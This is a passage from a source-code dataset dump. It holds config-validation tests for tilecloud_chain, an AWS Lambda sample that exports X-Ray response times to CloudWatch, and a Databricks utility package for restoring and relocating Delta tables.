os.chdir(os.path.dirname(__file__))\n\n @classmethod\n def tearDownClass(cls): # noqa\n os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))\n\n def test_resolution(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/wrong_resolutions.yaml\",\n main_func=controller.main,\n get_error=True,\n )\n log_capture.check(\n (\"tilecloud_chain\", \"ERROR\", \"The resolution 0.1 * resolution_scale 5 is not an integer.\"),\n )\n\n def test_mapnik_grid_meta(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/wrong_mapnik_grid_meta.yaml\",\n main_func=controller.main,\n get_error=True,\n )\n log_capture.check(\n (\n \"tilecloud_chain\",\n \"ERROR\",\n \"The layer 'b' is of type Mapnik/Grid, that can't support matatiles.\",\n )\n )\n\n def test_type(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -v -c tilegeneration/wrong_type.yaml\",\n main_func=controller.main,\n get_error=True,\n )\n log_capture.check(\n (\n \"tilecloud_chain\",\n \"ERROR\",\n \"\"\"The config file is invalid:\n-- tilegeneration/wrong_type.yaml:10:10 grids.swissgrid_2.srs: {} is not of type 'string' (rule: properties.grids.additionalProperties.properties.srs.type)\n-- tilegeneration/wrong_type.yaml:12:5 grids.swissgrid_3.srs: 'epsg:21781' does not match '^EPSG:[0-9]+$' (rule: properties.grids.additionalProperties.properties.srs.pattern)\n-- tilegeneration/wrong_type.yaml:12:5 grids.swissgrid_3: 'bbox' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:12:5 grids.swissgrid_3: 'resolutions' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:14:5 grids.swissgrid_4.srs: 'epsg21781' does not match '^EPSG:[0-9]+$' (rule: properties.grids.additionalProperties.properties.srs.pattern)\n-- tilegeneration/wrong_type.yaml:14:5 grids.swissgrid_4: 'bbox' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:14:5 grids.swissgrid_4: 'resolutions' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:15:16 grids.swissgrid_5: 'bbox' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:15:16 grids.swissgrid_5: 'resolutions' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:15:16 grids.swissgrid_5: 'srs' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:17:15 grids.swissgrid!: 'bbox' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:17:15 grids.swissgrid!: 'resolutions' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:17:15 grids.swissgrid!: 'srs' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_type.yaml:22:3 layers: 'hi!' does not match '^[a-zA-Z0-9_\\\\\\\\-~\\\\\\\\.]+$' (rule: properties.layers.propertyNames.pattern)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!.wmts_style: 'yo!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.0.properties.wmts_style.pattern)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!.wmts_style: 'yo!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.1.properties.wmts_style.pattern)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!: 'extension' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!: 'extension' is a required property (rule: properties.layers.additionalProperties.anyOf.1.required)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!: 'grid' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!: 'grid' is a required property (rule: properties.layers.additionalProperties.anyOf.1.required)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!: 'layers' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!: 'mime_type' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!: 'mime_type' is a required property (rule: properties.layers.additionalProperties.anyOf.1.required)\n-- tilegeneration/wrong_type.yaml:23:5 layers.hi!: 'url' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_type.yaml:25:9 layers.hi!.dimensions.0.default: '2010!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.default.pattern)\n-- tilegeneration/wrong_type.yaml:25:9 layers.hi!.dimensions.0.default: '2010!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.default.pattern)\n-- tilegeneration/wrong_type.yaml:25:9 layers.hi!.dimensions.0.name: 'DATE!' does not match '^(?!(?i)(SERVICE|VERSION|REQUEST|LAYERS|STYLES|SRS|CRS|BBOX|WIDTH|HEIGHT|FORMAT|BGCOLOR|TRANSPARENT|SLD|EXCEPTIONS|SALT))[a-z0-9_\\\\\\\\-~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.name.pattern)\n-- tilegeneration/wrong_type.yaml:25:9 layers.hi!.dimensions.0.name: 'DATE!' does not match '^(?!(?i)(SERVICE|VERSION|REQUEST|LAYERS|STYLES|SRS|CRS|BBOX|WIDTH|HEIGHT|FORMAT|BGCOLOR|TRANSPARENT|SLD|EXCEPTIONS|SALT))[a-z0-9_\\\\\\\\-~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.name.pattern)\n-- tilegeneration/wrong_type.yaml:27:19 layers.hi!.dimensions.0.generate.0: '2012!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.generate.items.pattern)\n-- tilegeneration/wrong_type.yaml:27:19 layers.hi!.dimensions.0.generate.0: '2012!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.generate.items.pattern)\n-- tilegeneration/wrong_type.yaml:28:17 layers.hi!.dimensions.0.values.0: '2005!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.values.items.pattern)\n-- tilegeneration/wrong_type.yaml:28:17 layers.hi!.dimensions.0.values.0: '2005!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.values.items.pattern)\n-- tilegeneration/wrong_type.yaml:28:17 layers.hi!.dimensions.0.values.1: '2010!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.values.items.pattern)\n-- tilegeneration/wrong_type.yaml:28:17 layers.hi!.dimensions.0.values.1: '2010!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.values.items.pattern)\n-- tilegeneration/wrong_type.yaml:28:17 layers.hi!.dimensions.0.values.2: '2012!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.values.items.pattern)\n-- tilegeneration/wrong_type.yaml:28:17 layers.hi!.dimensions.0.values.2: '2012!' does not match '^[a-zA-Z0-9_\\\\\\\\-\\\\\\\\+~\\\\\\\\.]+$' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.values.items.pattern)\n-- tilegeneration/wrong_type.yaml:29:9 layers.hi!.dimensions.1.default: 1 is not of type 'string' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.default.type)\n-- tilegeneration/wrong_type.yaml:29:9 layers.hi!.dimensions.1.default: 1 is not of type 'string' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.default.type)\n-- tilegeneration/wrong_type.yaml:2:3 grids.swissgrid_6: None is not of type 'object' (rule: properties.grids.additionalProperties.type)\n-- tilegeneration/wrong_type.yaml:2:3 grids: 'swissgrid!' does not match '^[a-zA-Z0-9_\\\\\\\\-~\\\\\\\\.]+$' (rule: properties.grids.propertyNames.pattern)\n-- tilegeneration/wrong_type.yaml:31:19 layers.hi!.dimensions.1.generate.0: 1 is not of type 'string' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.generate.items.type)\n-- tilegeneration/wrong_type.yaml:31:19 layers.hi!.dimensions.1.generate.0: 1 is not of type 'string' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.generate.items.type)\n-- tilegeneration/wrong_type.yaml:32:17 layers.hi!.dimensions.1.values.0: 1 is not of type 'string' (rule: properties.layers.additionalProperties.anyOf.0.properties.dimensions.items.properties.values.items.type)\n-- tilegeneration/wrong_type.yaml:32:17 layers.hi!.dimensions.1.values.0: 1 is not of type 'string' (rule: properties.layers.additionalProperties.anyOf.1.properties.dimensions.items.properties.values.items.type)\n-- tilegeneration/wrong_type.yaml:3:5 grids.swissgrid_1.resolution_scale: 5.5 is not of type 'integer' (rule: properties.grids.additionalProperties.properties.resolution_scale.type)\n-- tilegeneration/wrong_type.yaml:5:11 grids.swissgrid_1.bbox.0: 'a' is not of type 'number' (rule: properties.grids.additionalProperties.properties.bbox.items.type)\n-- tilegeneration/wrong_type.yaml:5:11 grids.swissgrid_1.bbox.1: 'b' is not of type 'number' (rule: properties.grids.additionalProperties.properties.bbox.items.type)\n-- tilegeneration/wrong_type.yaml:5:11 grids.swissgrid_1.bbox.2: 'c' is not of type 'number' (rule: properties.grids.additionalProperties.properties.bbox.items.type)\n-- tilegeneration/wrong_type.yaml:6:10 grids.swissgrid_1.srs: ['EPSG:21781'] is not of type 'string' (rule: properties.grids.additionalProperties.properties.srs.type)\"\"\", # noqa\n )\n )\n\n def test_zoom_errors(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_tiles -c tilegeneration/test-nosns.yaml -l point --zoom 4,10\",\n main_func=generate.main,\n )\n log_capture.check_present(\n (\n \"tilecloud_chain\",\n \"WARNING\",\n \"zoom 10 is greater than the maximum zoom 4 of grid swissgrid_5 of layer point, ignored.\",\n ),\n (\n \"tilecloud_chain\",\n \"WARNING\",\n \"zoom 4 corresponds to resolution 5 \"\n \"is smaller than the 'min_resolution_seed' 10 of layer point, ignored.\",\n ),\n )\n\n def test_wrong_srs_auth(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/wrong_srs_auth.yaml\",\n main_func=controller.main,\n get_error=True,\n )\n log_capture.check(\n (\n \"tilecloud_chain\",\n \"ERROR\",\n \"\"\"The config file is invalid:\n-- tilegeneration/wrong_srs_auth.yaml:3:5 grids.swissgrid_01.srs: 'toto:21781' does not match '^EPSG:[0-9]+$' (rule: properties.grids.additionalProperties.properties.srs.pattern)\"\"\", # noqa\n )\n )\n\n def test_wrong_srs_id(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/wrong_srs_id.yaml\",\n main_func=controller.main,\n get_error=True,\n )\n log_capture.check(\n (\n \"tilecloud_chain\",\n \"ERROR\",\n \"\"\"The config file is invalid:\n-- tilegeneration/wrong_srs_id.yaml:3:5 grids.swissgrid_01.srs: 'EPSG:21781a' does not match '^EPSG:[0-9]+$' (rule: properties.grids.additionalProperties.properties.srs.pattern)\"\"\", # noqa\n )\n )\n\n def test_wrong_srs(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/wrong_srs.yaml\",\n main_func=controller.main,\n get_error=True,\n )\n log_capture.check(\n (\n \"tilecloud_chain\",\n \"ERROR\",\n \"\"\"The config file is invalid:\n-- tilegeneration/wrong_srs.yaml:3:5 grids.swissgrid_01.srs: 'EPSG21781' does not match '^EPSG:[0-9]+$' (rule: properties.grids.additionalProperties.properties.srs.pattern)\"\"\",\n )\n )\n\n def test_wrong_map(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/wrong_map.yaml\",\n main_func=controller.main,\n get_error=True,\n )\n log_capture.check(\n (\n \"tilecloud_chain\",\n \"ERROR\",\n \"\"\"The config file is invalid:\n-- tilegeneration/wrong_map.yaml:3:5 layers.test.empty_tile_detection: 'test' is not of type 'object' (rule: properties.layers.additionalProperties.anyOf.0.properties.empty_tile_detection.type)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test.empty_tile_detection: 'test' is not of type 'object' (rule: properties.layers.additionalProperties.anyOf.1.properties.empty_tile_detection.type)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'extension' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'extension' is a required property (rule: properties.layers.additionalProperties.anyOf.1.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'grid' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'grid' is a required property (rule: properties.layers.additionalProperties.anyOf.1.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'layers' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'mime_type' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'mime_type' is a required property (rule: properties.layers.additionalProperties.anyOf.1.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'url' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'wmts_style' is a required property (rule: properties.layers.additionalProperties.anyOf.0.required)\n-- tilegeneration/wrong_map.yaml:3:5 layers.test: 'wmts_style' is a required property (rule: properties.layers.additionalProperties.anyOf.1.required)\"\"\",\n )\n )\n\n def test_wrong_sequence(self) -> None:\n with LogCapture(\"tilecloud_chain\") as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/wrong_sequence.yaml\",\n main_func=controller.main,\n get_error=True,\n )\n log_capture.check(\n (\n \"tilecloud_chain\",\n \"ERROR\",\n \"\"\"The config file is invalid:\n-- tilegeneration/wrong_sequence.yaml:3:5 grids.test.resolutions: 'test' is not of type 'array' (rule: properties.grids.additionalProperties.properties.resolutions.type)\n-- tilegeneration/wrong_sequence.yaml:3:5 grids.test: 'bbox' is a required property (rule: properties.grids.additionalProperties.required)\n-- tilegeneration/wrong_sequence.yaml:3:5 grids.test: 'srs' is a required property (rule: properties.grids.additionalProperties.required)\"\"\",\n )\n )\n" } ]
44
msysh/aws-sample-xray-responsetime-into-cloudwatch
https://github.com/msysh/aws-sample-xray-responsetime-into-cloudwatch
d87908ace240244182c8c154876087fb16415d5a
762bad6116a81319dcd15195e6a763392adb9a2a
5dc988bd6ce1dbf3194941ad22586dde0ea37ea2
refs/heads/master
2022-10-16T09:45:44.693472
2020-06-11T16:22:11
2020-06-11T16:22:11
271,546,404
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7066666483879089, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 18, "blob_id": "2a37926ded3eb4a4965635fdd642ab6fd4192d71", "content_id": "133256d54534ec4741817c6eb6dd9d13115208ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 75, "license_type": "no_license", "max_line_length": 34, "num_lines": 4, "path": "/conftest.py", "repo_name": "msysh/aws-sample-xray-responsetime-into-cloudwatch", "src_encoding": "UTF-8", "text": "import sys, os\n\nhere = os.path.abspath(\"function\")\nsys.path.insert(0, here)" }, { "alpha_fraction": 0.5983918905258179, "alphanum_fraction": 0.6026237607002258, "avg_line_length": 30.50666618347168, "blob_id": "67bebde6f447a18eaed3d19dd3b6b7a14a2fb94d", "content_id": "0aa66333363fcf074a99e908b0450a8920965b85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2363, "license_type": "no_license", "max_line_length": 87, "num_lines": 75, "path": "/function/main/app.py", "repo_name": "msysh/aws-sample-xray-responsetime-into-cloudwatch", "src_encoding": "UTF-8", "text": "import os\nimport logging\nimport time\nimport boto3\nimport botocore\n\nXRAY_GROUP_NAME = os.getenv('XRAY_GROUP_NAME', 'default')\nCW_METRICS_NAMESPACE = os.getenv('CW_METRICS_NAMESPACE', 'X-Ray/Custome Metrics')\nSAMPLIG_INTERVAL = int(os.getenv('SAMPLING_INTERVAL', '60'))\n\nlevel = logging.getLevelName(os.getenv('LOG_LEVEL', 'INFO'))\nif not isinstance(level, int):\n level = logging.INFO\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(level)\n\ncloudwatch = boto3.client('cloudwatch')\nxray = boto3.client('xray')\n\ndef get_response_time(executed_time):\n try:\n response = xray.get_service_graph(\n StartTime = executed_time - SAMPLIG_INTERVAL,\n EndTime = executed_time,\n GroupName = XRAY_GROUP_NAME\n )\n logger.debug(f\"Response : {response}\")\n except botocore.exceptions.ClientError as error:\n logger.error(f\"Error : {error}\")\n raise error\n\n return response\n\ndef put_metrics(executed_time, values, counts):\n try:\n response = cloudwatch.put_metric_data(\n Namespace = CW_METRICS_NAMESPACE,\n MetricData = [\n {\n 'MetricName': 'Response Time',\n 'Dimensions': [\n { 'Name': 'GroupName', 'Value': XRAY_GROUP_NAME }\n ],\n 'Timestamp': executed_time,\n 'Values': values,\n 'Counts': counts,\n 'Unit': 'Seconds'\n }\n ]\n )\n logger.debug(f\"Response: {response}\")\n except botocore.exceptions.ClientError as error:\n logger.error(f\"Error : {error}\")\n\n return response\n\ndef execute(executed_time):\n response_time = get_response_time(executed_time)\n\n service_client = [s for s in response_time['Services'] if s['Type'] == 'client'][0]\n edge = [e for e in service_client['Edges'] if 'ResponseTimeHistogram' in e][0]\n end_time = edge['EndTime']\n # TODO : if len(ResponseTimeHistogram) > 150\n values = [v['Value'] for v in edge['ResponseTimeHistogram']]\n counts = [v['Count'] for v in edge['ResponseTimeHistogram']]\n\n put_metrics(end_time, values, counts)\n\n\ndef lambda_handler(event, context):\n executed_time = int(time.time())\n logger.info(f\"Current time : {executed_time}\")\n logger.debug(event)\n execute(executed_time)\n" }, { "alpha_fraction": 0.7647058963775635, "alphanum_fraction": 0.7647058963775635, "avg_line_length": 22.866666793823242, "blob_id": "1076346b7ebebce115878e8fb94e8da80d5b228b", "content_id": "1ce7d39c243d99b17a0094195d6d4bd3cee6fc4c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 357, "license_type": "no_license", "max_line_length": 150, "num_lines": 15, "path": "/README.md", "repo_name": "msysh/aws-sample-xray-responsetime-into-cloudwatch", "src_encoding": "UTF-8", "text": "# AWS X-Ray response time into Amazon CloudWatch Metrics\n\nThis is a sample AWS SAM template that registers client response times traced by a specific group of AWS X-Ray as custom metrics in Amazon CloudWatch.\n\n## Build\n\n```\nsam build --parameter-overrides \"ParameterKey=XRayGroupName,ParameterValue=XRayGroupName\"\n```\n\n## Deploy\n\n```\nsam deploy --guided\n```" } ]
3
mao-liu/bricklayer
https://github.com/mao-liu/bricklayer
193b565c988f44edac5bf7091455af96155d3fe4
4cb0ede9b9b7cd7f48ea992c054ac411213b4649
f00ced0f7a3f3391162bda298abe9aae6cee7b5b
refs/heads/master
2023-07-15T10:51:41.991363
2021-08-20T01:06:41
2021-08-20T01:06:41
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6010442972183228, "alphanum_fraction": 0.6014676690101624, "avg_line_length": 37.721309661865234, "blob_id": "225cddf0a62a1c7d631d326a94b82f236fab2295", "content_id": "0aae980607e2f44fd7ca496a50828a245c6be89b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7086, "license_type": "permissive", "max_line_length": 124, "num_lines": 183, "path": "/bricklayer/catalog/crawler.py", "repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "\"\"\"\n delta_tables crawlers\n two functions supported\n - restore delta tables from delta_log location\n - update existing delta table from delta_log location\n ```\n\"\"\"\n\nimport typing\nimport logging\nfrom pathlib import Path\nfrom pyspark.sql import SparkSession\nfrom . import dbricks_catalog\n\nclass Crawler():\n\n def __init__(self):\n self.spark = SparkSession.builder.getOrCreate()\n\n def restore_delta_tables(\n self,\n dbfs_path: str,\n table_names: typing.Iterable[str] = None,\n prefixes: typing.Iterable[str] = None\n ) -> None:\n \"\"\"recreate delta tables for all delta_log/ path which was found in the target directory\n Args:\n dbfs_path (str): relative path to dbfs/ in which save the delta table data\n tables (typing.Iterable[str], optional): tables(table_sql_name) to be restored\n prefixes (typing.Iterable[str], optional): prefix of tables to be relocated.\n If `talbe_names` and `prefixes` are using at the same time, only `table_names` start with `prefixes` will in\n \"\"\"\n if isinstance(table_names, str):\n table_names = [table_names]\n\n if isinstance(prefixes, str):\n prefixes = [prefixes]\n\n logging.info(f'Input `dbfs_path`: {dbfs_path}')\n dbfs_path = dbfs_path.strip('/')\n abs_path = Path(f'/dbfs/{dbfs_path}')\n logging.info(f'Absolute full path of the directory: {str(abs_path)}')\n\n if not table_names:\n table_names = self._get_all_tables_from_dbfs_path(abs_path)\n\n if prefixes:\n logging.debug(f'table_names before filtering: {table_names}')\n table_names = self._filter_tables_by_prefixes(table_names, prefixes)\n logging.debug(f'table_names after filtering: {table_names}')\n\n if not table_names:\n logging.warn('Cannot find any qualified table to restore')\n return\n\n success_paths = []\n failure_paths = []\n for t in table_names:\n table_name, version = t.split('_version_')\n table_location_path = f'/{dbfs_path}/{table_name}/version={version}'\n if self._create_delta_table(t, table_location_path):\n success_paths.append(table_location_path)\n else:\n failure_paths.append(table_location_path)\n logging.info(f\"Restoring successful: {success_paths}\")\n logging.info(f\"Restoring failed: {failure_paths}\")\n\n def _create_delta_table(self, table_sql_name: str, table_location_path: str) -> bool:\n sql = f\"\"\"\n CREATE TABLE {table_sql_name}\n USING DELTA \n LOCATION '{table_location_path}'\n \"\"\"\n\n if Path(f'/dbfs{table_location_path}/_delta_log').exists():\n self.spark.sql(sql)\n logging.info(f'Restoring delta table for {table_sql_name} at {table_location_path} SUCCESS')\n return True\n else:\n logging.debug(f'`/dbfs{table_location_path}/_delta_log` doesn\\'t exist')\n logging.debug(f'Restoring delta table for {table_sql_name} at {table_location_path} FAILED')\n return False\n\n def relocate_delta_tables(\n self,\n dbfs_path: str,\n table_names: typing.Iterable[str] = None,\n prefixes: typing.Iterable[str] = None\n ) -> None:\n \"\"\"update the location url for all tables which could be retrieved by Databricks sql\n Args:\n dbfs_path (str): working directory in which save the delta table data\n table_names (typing.Iterable[str], optional): tables to be relocated\n prefixes (typing.Iterable[str], optional): prefix of tables to be relocated.\n If `talbe_names` and `prefixes` are using at the same time, only `table_names` start with `prefixes` will in\n \"\"\"\n if isinstance(table_names, str):\n table_names = [table_names]\n\n if isinstance(prefixes, str):\n prefixes = [prefixes]\n\n logging.info(f'Input `dbfs_path`: {dbfs_path}')\n dbfs_path = dbfs_path.strip('/')\n\n if not table_names:\n table_names = self._get_all_tables_from_dbs_catalog()\n\n if prefixes:\n logging.debug(f'table_names before filtering: {table_names}')\n table_names = self._filter_tables_by_prefixes(table_names, prefixes)\n logging.debug(f'table_names after filtering: {table_names}')\n\n if not table_names:\n logging.warn('Cannot find any qualified table to relocate')\n return\n\n success_tables = []\n failure_tables = []\n for t in table_names:\n table_name, version = t.split('_version_')\n table_new_location_path = f'/{dbfs_path}/{table_name}/version={version}'\n if self._update_delta_table_location(t, table_new_location_path):\n success_tables.append(t)\n else:\n failure_tables.append(t)\n logging.info(f\"Relocating successful: {success_tables}\")\n logging.info(f\"Relocating failed: {failure_tables}\")\n\n def _update_delta_table_location(self, table_sql_name: str, table_new_location_path: str) -> bool:\n sql = f\"\"\"\n ALTER TABLE {table_sql_name}\n SET LOCATION '{table_new_location_path}'\n \"\"\"\n\n if Path(f'/dbfs{table_new_location_path}/_delta_log').exists():\n self.spark.sql(sql)\n logging.info(f'Relocating delta table for {table_sql_name} to {table_new_location_path} SUCCESS')\n return True\n else:\n logging.debug(f'`/dbfs{table_new_location_path}/_delta_log` doesn\\'t exist')\n logging.debug(f'Relocating delta table for {table_sql_name} to {table_new_location_path} FAILED')\n return False\n\n def _get_all_tables_from_dbs_catalog(self):\n return [\n table.sql_name\n for db in dbricks_catalog.DbricksCatalog().get_databases()\n for table in db.get_tables()\n if not table.is_view\n ]\n\n def _get_all_tables_from_dbfs_path(self, abs_path: str):\n return [\n f\"{p.relative_to(abs_path).parts[0]}_version_{p.relative_to(abs_path).parts[1].split('version=')[1]}\"\n for p in abs_path.glob('*.*/version=*/_delta_log/')\n ]\n\n def _filter_tables_by_prefixes(\n self,\n table_names: typing.Iterable[str],\n prefixes: typing.Iterable[str]\n ) -> typing.Iterable[str]:\n return [\n table_name\n for prefix in prefixes\n for table_name in table_names\n if table_name.startswith(prefix)\n ]\n\ndef restore_delta_tables(\n dbfs_path: str,\n table_names: typing.Iterable[str] = None,\n prefixes: typing.Iterable[str] = None\n ):\n Crawler().restore_delta_tables(dbfs_path, table_names, prefixes)\n\ndef relocate_delta_tables(\n dbfs_path: str,\n table_names: typing.Iterable[str] = None,\n prefixes: typing.Iterable[str] = None\n ):\n Crawler().relocate_delta_tables(dbfs_path, table_names, prefixes)\n" }, { "alpha_fraction": 0.634441077709198, "alphanum_fraction": 0.634441077709198, "avg_line_length": 21.066667556762695, "blob_id": "7acc68c9a21bb9bf6c751805d1d85bdcfbdc0925", "content_id": "3efc7656abc5c1c6e7c10207c246de59835de3ff", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 331, "license_type": "permissive", "max_line_length": 64, "num_lines": 15, "path": "/makefile", "repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "# short commit hash\nGIT_COMMIT=`git rev-parse --short HEAD`\n\n.DEFAULT_GOAL := help\n\nhelp:\n\t@echo \"Build targets:\"\n\t@echo \"- clean: cleans the build directory\"\n\t@echo \"- build_wheel: \t\tbuilds wheel package locally\"\n\nclean:\n\trm -rf build/*; rm -rf dist/*\n\nbuild_wheel:\n\tpython setup.py sdist bdist_wheel\n" }, { "alpha_fraction": 0.6643962860107422, "alphanum_fraction": 0.665015459060669, "avg_line_length": 28.907407760620117, "blob_id": "36426794ced04f841805cbd41d6ac79ea439f069", "content_id": "1e71584d65208b907d9ae8f0bcbaf0d66ed27422", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1615, "license_type": "permissive", "max_line_length": 89, "num_lines": 54, "path": "/bricklayer/__init__.py", "repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "import json\nimport logging\nimport sys\nfrom logging import NullHandler\n\n# Set default logging handler to avoid \"No handler found\" warnings.\nlogging.getLogger(__name__).addHandler(NullHandler())\nlogging.getLogger(\"py4j\").setLevel(logging.ERROR)\nlogging.basicConfig(\n level='INFO',\n stream=sys.stdout,\n format='[{levelname}] [{asctime}] [{name}] [{module}.{funcName}] {message}',\n style='{'\n)\n\ndef get_dbutils(spark):\n from pyspark.dbutils import DBUtils\n return DBUtils(spark)\n\ndef get_spark():\n from pyspark.sql import SparkSession\n return SparkSession.builder.getOrCreate()\n\nclass NotebookContext():\n\n def __init__(self):\n dbutils = get_dbutils(get_spark())\n self._context = dbutils.notebook.entry_point.getDbutils().notebook().getContext()\n self._context_tags = json.loads(self._context.toJson()).get('tags')\n\n def get_run_id(self):\n \"\"\"Return the current run id\"\"\"\n return self._context.currentRunId().toString()\n\n def get_api_token(self):\n \"\"\"Return the token id\"\"\"\n return self._context.apiToken().value()\n\n def get_browser_host_name(self):\n \"\"\"Return the notebook host name\"\"\"\n return self._context_tags.get('browserHostName')\n\n def get_browser_host_name_url(self):\n \"\"\"Return the notebook url host name\"\"\"\n return f'https://{self.get_browser_host_name()}'\n\n def get_notebook_path(self):\n return self._context.notebookPath().value()\n \n def get_notebook_cluster_id(self):\n return self._context.clusterId().value()\n\ndef get_notebook_context():\n return NotebookContext()\n" }, { "alpha_fraction": 0.8148148059844971, "alphanum_fraction": 0.8148148059844971, "avg_line_length": 25.5, "blob_id": "1922ae0f0ef9f4d9fb1112071e28b30261f99fc8", "content_id": 